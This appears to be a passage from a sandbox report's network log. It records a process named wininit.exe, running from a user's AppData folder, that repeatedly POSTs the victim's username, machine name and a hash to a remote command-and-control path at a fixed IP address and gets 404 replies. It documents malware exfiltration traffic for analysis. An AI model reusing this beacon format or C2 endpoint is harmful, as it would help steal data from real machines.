Nov 20, 2024 10:11:50.661518097 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:11:50 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.22	49187	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:11:50.817913055 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:11:50.825355053 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:11:51.563699961 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:11:51 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.22	49188	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:11:51.969063997 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:11:51.974265099 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:11:52.677114010 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:11:52 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.22	49189	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:11:52.828480005 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:11:52.833476067 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:11:53.596098900 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:11:53 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.22	49190	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:11:53.737376928 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:11:53.743942022 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:11:54.506406069 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:11:54 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.22	49191	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:11:54.658297062 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:11:54.665755033 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:11:55.397053003 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:11:55 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.22	49192	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:11:55.536037922 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:11:55.543704987 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:11:56.305603981 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:11:56 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.22	49193	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:11:56.459002018 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:11:56.465409040 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:11:57.196352005 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:11:57 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.22	49194	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:11:57.346908092 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:11:57.354850054 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:11:58.102369070 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:11:57 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.22	49195	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:11:58.246757030 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:11:58.251851082 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:11:58.990710020 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:11:58 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.22	49196	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:11:59.147855043 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:11:59.153132915 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:11:59.906487942 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:11:59 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.22	49197	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:00.055174112 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:00.062552929 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:00.919509888 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:00 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.22	49198	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:01.076596975 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:01.086240053 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:01.961283922 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:01 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.22	49199	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:02.128051996 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:02.135571957 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:03.001914978 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:02 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.22	49200	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:03.148977041 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:03.154170990 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:04.030916929 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:03 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.22	49201	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:04.176157951 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:04.183469057 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:05.064814091 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:04 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.22	49202	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:05.216603041 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:05.221729994 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:05.957222939 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:05 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.22	49203	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:06.095170975 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:06.101870060 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:06.846041918 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:06 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.22	49204	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:06.986717939 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:06.992362022 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:07.734381914 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:07 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.22	49205	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:07.873225927 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:07.878232956 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:08.610301018 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:08 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.22	49206	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:08.751954079 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:08.762365103 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:09.486146927 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:09 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.22	49207	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:09.632071972 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:09.636982918 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:10.488801956 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:10 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.22	49208	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
